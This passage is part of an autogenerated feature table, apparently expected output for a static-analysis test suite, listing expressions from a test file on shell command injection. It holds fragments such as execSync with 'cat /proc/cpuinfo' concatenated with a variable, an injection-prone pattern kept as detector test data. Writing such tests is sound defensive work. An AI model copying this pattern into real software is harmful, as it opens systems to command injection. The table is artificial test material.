"bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:37:86:43 | newPath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:37:86:43 | newPath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:37:86:43 | newPath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:37:86:43 | newPath | stringConcatenatedWith | 'foo/' -endpoint- 'bar' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:47:86:51 | "bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:47:86:51 | "bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:47:86:51 | "bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:47:86:51 | "bar" | stringConcatenatedWith | 'foo/' + newPath -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:57:86:74 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:58:86:65 | encoding | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:58:86:65 | encoding | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:58:86:65 | encoding | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:58:86:73 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:58:86:73 | encoding: 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:58:86:73 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:58:86:73 | encoding: 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:58:86:73 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:58:86:73 | encoding: 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:68:86:73 | 'utf8' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:68:86:73 | 'utf8' | InputAccessPathFromCallee | 2.encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:68:86:73 | 'utf8' | InputArgumentIndex | 2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:68:86:73 | 'utf8' | assignedToPropName | encoding | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:68:86:73 | 'utf8' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:68:86:73 | 'utf8' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:68:86:73 | 'utf8' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:86:68:86:73 | 'utf8' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:35 | exceptional return of execSyn ... + foo) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:35 | exceptional return of execSyn ... + foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:35 | exceptional return of execSyn ... + foo) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:35 | execSyn ... + foo) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:35 | execSyn ... + foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:35 | execSyn ... + foo) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:44 | execSyn ... oString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:44 | execSyn ... oString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:44 | execSyn ... oString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:46 | exceptional return of execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:46 | exceptional return of execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:46 | exceptional return of execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:46 | execSyn ... tring() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:46 | execSyn ... tring() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:1:88:46 | execSyn ... tring() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:28 | 'cat /proc/cpuinfo' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:28 | 'cat /proc/cpuinfo' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:28 | 'cat /proc/cpuinfo' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:28 | 'cat /proc/cpuinfo' | stringConcatenatedWith | -endpoint- foo | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:34 | 'cat /p ... ' + foo | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:34 | 'cat /p ... ' + foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:34 | 'cat /p ... ' + foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:34 | 'cat /p ... ' + foo | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:34 | 'cat /p ... ' + foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:10:88:34 | 'cat /p ... ' + foo | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:32:88:34 | foo | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:32:88:34 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:32:88:34 | foo | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:32:88:34 | foo | stringConcatenatedWith | 'cat /proc/cpuinfo' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:37:88:44 | toString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:37:88:44 | toString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:88:37:88:44 | toString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:50 | exceptional return of execFil ... th}` ]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:50 | exceptional return of execFil ... th}` ]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:50 | exceptional return of execFil ... th}` ]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:50 | execFil ... th}` ]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:50 | execFil ... th}` ]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:1:90:50 | execFil ... th}` ]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:14:90:23 | '/bin/cat' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:14:90:23 | '/bin/cat' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:14:90:23 | '/bin/cat' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:14:90:23 | '/bin/cat' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:14:90:23 | '/bin/cat' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:14:90:23 | '/bin/cat' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:26:90:49 | [ `foo/ ... ath}` ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:26:90:49 | [ `foo/ ... ath}` ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:26:90:49 | [ `foo/ ... ath}` ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:26:90:49 | [ `foo/ ... ath}` ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:26:90:49 | [ `foo/ ... ath}` ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:26:90:49 | [ `foo/ ... ath}` ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:28:90:47 | `foo/bar/${newpath}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:28:90:47 | `foo/bar/${newpath}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:28:90:47 | `foo/bar/${newpath}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:28:90:47 | `foo/bar/${newpath}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:28:90:47 | `foo/bar/${newpath}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:28:90:47 | `foo/bar/${newpath}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:29:90:36 | foo/bar/ | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:29:90:36 | foo/bar/ | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:29:90:36 | foo/bar/ | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:29:90:36 | foo/bar/ | stringConcatenatedWith | -endpoint- newpath | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:39:90:45 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:39:90:45 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:39:90:45 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:90:39:90:45 | newpath | stringConcatenatedWith | 'foo/bar/' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:12 | execFileSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:12 | execFileSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:12 | execFileSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:46 | exceptional return of execFil ... th}` ]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:46 | exceptional return of execFil ... th}` ]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:46 | exceptional return of execFil ... th}` ]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:46 | execFil ... th}` ]) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:46 | execFil ... th}` ]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:1:92:46 | execFil ... th}` ]) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:14:92:19 | 'node' | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:14:92:19 | 'node' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:14:92:19 | 'node' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:14:92:19 | 'node' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:14:92:19 | 'node' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:14:92:19 | 'node' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:22:92:45 | [ `foo/ ... ath}` ] | CalleeFlexibleAccessPath | execFileSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:22:92:45 | [ `foo/ ... ath}` ] | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:22:92:45 | [ `foo/ ... ath}` ] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:22:92:45 | [ `foo/ ... ath}` ] | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:22:92:45 | [ `foo/ ... ath}` ] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:22:92:45 | [ `foo/ ... ath}` ] | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:24:92:43 | `foo/bar/${newpath}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:24:92:43 | `foo/bar/${newpath}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:24:92:43 | `foo/bar/${newpath}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:24:92:43 | `foo/bar/${newpath}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:24:92:43 | `foo/bar/${newpath}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:24:92:43 | `foo/bar/${newpath}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:25:92:32 | foo/bar/ | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:25:92:32 | foo/bar/ | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:25:92:32 | foo/bar/ | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:25:92:32 | foo/bar/ | stringConcatenatedWith | -endpoint- newpath | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:35:92:41 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:35:92:41 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:35:92:41 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:92:35:92:41 | newpath | stringConcatenatedWith | 'foo/bar/' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:43 | exceptional return of exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:43 | exceptional return of exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:43 | exceptional return of exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:43 | exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:43 | exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:1:94:43 | exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:6:94:18 | "cat foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:6:94:18 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:6:94:18 | "cat foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:6:94:18 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:6:94:18 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:6:94:18 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:20 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:20 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:20 | this | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:20 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:20 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | 'arguments' object of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | exceptional return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | functio ... out) {} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | functio ... out) {} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | functio ... out) {} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | functio ... out) {} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | functio ... out) {} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | functio ... out) {} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:21:94:42 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:31:94:33 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:31:94:33 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:31:94:33 | err | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:31:94:33 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:31:94:33 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:94:36:94:38 | out | contextFunctionInterfaces | cat(file) | +| 